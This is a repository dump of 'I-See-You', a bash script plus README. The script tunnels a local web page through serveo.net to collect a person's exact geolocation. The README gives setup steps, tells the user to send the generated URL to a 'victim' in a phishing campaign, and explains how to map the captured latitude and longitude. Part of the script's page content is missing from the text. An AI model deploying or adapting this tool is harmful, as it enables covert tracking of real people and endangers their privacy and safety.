├── ISeeYou.sh └── README.md /ISeeYou.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #Serveo to host page using remote port forwarding 4 | xterm -e ssh -R 80:localhost:80 serveo.net & clear 5 | 6 | 7 | echo " 8 | 9 | ██╗ ███████╗███████╗███████╗ ██╗ ██╗ ██████╗ ██╗ ██╗ 10 | ██║ ██╔════╝██╔════╝██╔════╝ ╚██╗ ██╔╝██╔═══██╗██║ ██║ 11 | ██║ ███████╗█████╗ █████╗ ╚████╔╝ ██║ ██║██║ ██║ 12 | ██║ ╚════██║██╔══╝ ██╔══╝ ╚██╔╝ ██║ ██║██║ ██║ 13 | ██║ ███████║███████╗███████╗ ██║ ╚██████╔╝╚██████╔╝ 14 | ╚═╝ ╚══════╝╚══════╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ 15 | 16 | [+] Author: Viral Maniar 17 | [+] Twitter: @ManiarViral 18 | [+] Description: This tool uses Serveo to find the exact location of the user during social engineering or phishing engagements. 19 | 20 | " 21 | sleep 5 22 | read -p 'Enter the URL generated by Serveo: ' varurl 23 | 24 | echo " 25 | 26 |
27 |18 | git clone https://github.com/Viralmaniar/I-See-You.git 19 | cd I-See-You 20 | chmod u+x ISeeYou.sh 21 | ./ISeeYou.sh 22 |23 |  24 | 25 | # Screenshots 26 | 27 | Once the `ISeeYou.sh` is ran user sees the below screen: 28 | 29 |  30 | 31 | Enter the highlighted url on the main screen where it asks for `Enter the URL generated by Serveo` and hit `Enter`: 32 | 33 |  34 | 35 | This URL is generated randomly for different users. However, it will be a subdomain for the serveo.net domain. Send this URL to your victim as part of the phishing campaign via email or any other medium. Victim will see the site as below: 36 | 37 |  38 | 39 | Note: You can be creative and modify the look and feel of the page as per your requirement. 40 | 41 | Once the targeted users allows location permission, malicious user will receive exact location of the victim in the tail screen. These numbers are `longitude and latitude` of the user. 42 | 43 |  44 | 45 | Using `https://maps.google.com` you can convert the `longitude and latitude` to an exact location: 46 | 47 |  48 | 49 | # Copying Longitude and Latitude numbers from Xterm screens 50 | 51 | To copy between xterm and other programs - This would allow user to select numbers to be copied to the clipboard. 52 | 1. Add to the file ~/.Xresources (or create) 53 | 54 | 2. 55 |
56 | XTerm*selectToClipboard: true 57 |58 | 3. Then run the command: 59 |
60 | xrdb -merge ~/.Xresources 61 |62 | 4. Restart xterm. 63 | 64 | # Questions? 65 | 66 | Twitter: https://twitter.com/maniarviral